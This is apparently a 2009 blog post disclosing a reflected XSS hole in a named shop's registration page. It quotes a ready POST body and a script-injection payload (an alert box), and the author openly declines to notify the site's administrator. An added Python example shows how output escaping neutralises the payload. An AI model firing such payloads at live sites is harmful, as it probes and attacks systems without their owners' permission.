XSSed: softerpore.com

June 21, 2009

New blog, new XSS…
Today I found an internet shop which is doing a lot of comment spamming in blogs etc… -> http://www.softerpore.com
It did not take long to find an XSS hole in the registration page:
Just post
fname=%22%3E%3CSCrIPT%3Ealert%28%22Yes%2C+I%27m+vulnerable+to+XSS%22%29%3C%2FSCrIPT%3E&lname=&mail=&send=Create+Account
to http://www.softerpore.com/registration/

Or enter
"><SCrIPT>alert("Yes, I'm vulnerable to XSS")</SCrIPT>
into whichever input box you want.
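
Why the leading "> matters and what output encoding changes, as an added example that is not part of the original post and not the site's code. It assumes the page echoes fname back into the value attribute of its input box; render_unsafe, render_safe and tags_in are hypothetical names.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# POST body quoted in the post above.
BODY = ("fname=%22%3E%3CSCrIPT%3Ealert%28%22Yes%2C+I%27m+vulnerable+to+XSS"
        "%22%29%3C%2FSCrIPT%3E&lname=&mail=&send=Create+Account")

def parse_fname(body):
    """Decode the form body the way a server-side framework would."""
    return parse_qs(body, keep_blank_values=True)["fname"][0]

def render_unsafe(fname):
    """Hypothetical vulnerable template: the value is concatenated raw."""
    return '<input type="text" name="fname" value="' + fname + '">'

def render_safe(fname):
    """Same template with output encoding for a quoted attribute."""
    return ('<input type="text" name="fname" value="'
            + html.escape(fname, quote=True) + '">')

class TagCollector(HTMLParser):
    """Records each start tag and its attributes as an HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

if __name__ == "__main__":
    value = parse_fname(BODY)
    print("unsafe:", [t for t, _ in tags_in(render_unsafe(value))])
    print("safe:  ", [t for t, _ in tags_in(render_safe(value))])
```

With raw concatenation the parser sees an input element with an empty value followed by a separate script element; with encoding it sees a single input whose value is the submitted string, kept as data.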

And no… I will not give damn spammers a link to their website, you have to copy & paste… And in this case I will not send a notice to the administrator. He has enough to do with spamming etc., I don’t want to disturb him…
